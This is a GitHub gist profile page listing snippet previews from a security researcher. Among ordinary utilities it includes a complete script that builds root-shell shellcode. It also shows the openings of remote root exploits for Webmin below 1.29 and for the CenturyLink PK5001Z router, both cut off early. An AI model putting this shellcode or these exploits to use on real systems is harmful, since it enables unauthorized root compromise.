Skip to content

Instantly share code, notes, and snippets.

View oxagast's full-sized avatar
🔨
Probably breaking your code.

Mark Stealer Whitehall oxagast

🔨
Probably breaking your code.
View GitHub Profile
@oxagast
oxagast / nosecandy.c
Created January 20, 2016 23:04
nose candy
#include "stdio.h"
#include "string.h"
void test_op(unsigned char was, unsigned char expected) {
printf("%c", was);
}
int main(int argc, char *argv[]) {
if ((argc > 1) && (argc < 3)) {
char ui[10];
for (int uia=0; uia<6; uia++) {
ui[uia] = argv[1][uia];
echo AAAABCCCC | perl -e '$change = $ARGV[1]; $findme = $ARGV[0]; $let = <STDIN>; $hex = unpack("H*", $let); $reg = qr/$findme/; if ($hex =~ s/(.*)${reg}(.*)/\1$change\2/){$newhex = pack("H*", $hex);} print $newhex;' 414243 444546
@oxagast
oxagast / magicsquare.cpp
Last active June 30, 2016 16:37
magic square
// __ _ _ __ ___ __ ____ ____
// / ( \/ )/ _\ / __)/ _\/ ___(_ _)
// ( O ) (/ ( (_ / \___ \ )(
// \__(_/\_\_/\_/\___\_/\_(____/(__)
// magic square
#include <algorithm>
#include <cstdlib>
#include <cstring>
#include <iostream>
### godmode by oxagast ###
echo '#include <unistd.h>' > sc.c;
echo 'int main(void) {setuid(0);execlp("/bin/sh", "sh", NULL);}' >> sc.c;
gcc sc.c -o godmode;
SHELLCODE=$(objdump --show-raw-insn -d godmode | grep -v "file format" | cut -f 2 -d ':' | cut -c -21 | cut -c 2- | sed -e 's/ /\n/g' | grep -v "^$" | sed -e 's/^/\\x/' | tr -d "\n")
echo -n "char shellcode[] = "
echo $SHELLCODE | sed -e 's/\(.\{60\}\)/\1\n/' | head -n 1 > s.tmp; echo $SHELLCODE | sed -e 's/^\n//' | sed -e 's/\(.\{80\}\)/\1\n/g' | sed -e 's/.*\"/ \"/' >> s.tmp; cat s.tmp | sed -e 's/^\\/"\\/' -e 's/$/\"/' | head -c -1
echo ";";
rm sc.c godmode;
rm page_part 2>/dev/null;
arp | sed -e 's/.*ether[[:space:]]*//' -e 's/ C.*//' | grep : | xargs -I {XXX} curl -s https://www.adminsub.net/mac-address-finder/{XXX} | grep Vendor -A 1 | grep google > page_part;
cat page_part | cut -d '=' -f 5 | cut -d '"' -f 1 > macs_resolved && arp -n | arp -n | cut -f 1 -d ' ' > ips_tomac;
tail -n $(echo `cat ips_tomac | wc -l`-1 | bc) ips_tomac > ips_tomac2;
cat ips_tomac2 -n | tee resolved && cat macs_resolved -n | tee -a resolved;
rm ips_tomac ips_tomac2 macs_resolved page_part
#!/bin/bash
# alias "git"='~/.git_check_rsa.sh'
if [ "$(find . -type f 2>/dev/null | xargs head -n 1 2>/dev/null | grep 'BEGIN RSA' | head -n 1 2>/dev/null)" == "-----BEGIN RSA PRIVATE KEY-----" ]; then
echo RSA KEY FOUND!;
echo Not adding to git.;
exit 1;
else
git $@
fi
@oxagast
oxagast / github_rd.sh
Last active March 24, 2017 13:53
Get the total number of GitHub release downloads over all time for a project
REPO=ansvif; GITUSER=oxagast; curl -s https://api.github.com/repos/$GITUSER/$REPO/releases | grep download_count | sed -e 's/.*: //' -e 's/,/ + /' | tr -d '\n' | sed -e 's/+ $/\n/' | bc | tr -d '\n' ; echo " All time clones of $REPO."
@oxagast
oxagast / wmsploit-remote-root-1.29-reprise.sh
Created April 26, 2017 11:10
Webmin Remote root <1.29 exploit
HOST=$1;
PORT=$2;
LHOST=$3;
LPORT=$4;
if [ $# -lt 4 ]
then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE.";
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!";
echo "Usage:"
@oxagast
oxagast / .screenrc
Last active April 27, 2017 20:36
Screen Settings
startup_message off
#idle 1800 lockscreen
vbell off
msgwait 2
defscrollback 15000
defutf8 on
shell bash
shelltitle "$ |bash"
bind '/' eval "clear" "scrollback 0" "scrollback 15000"
bind = resize =
@oxagast
oxagast / pk5001z00pin.c
Last active May 6, 2018 16:15
Remote root Exploit for PK5001Z CenturyLink Routers.
/* PK5001Z CenturyLink Router/Modem remote root exploit */
/* oxagast / Marshall Whittaker */
/* marshall@likon:[~/Code/pk5001zpwn]: gcc pk5001z00pin.c -o pk5001z00pin */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin */
/* PK5001Z CenturyLink Router remote root 0day */
/* Enjoy! */
/* --oxagast */
/* marshall@likon:[~/Code/pk5001zpwn]: ./pk5001z00pin 192.168.0.1 */
/* */
/* # uname -a; id; */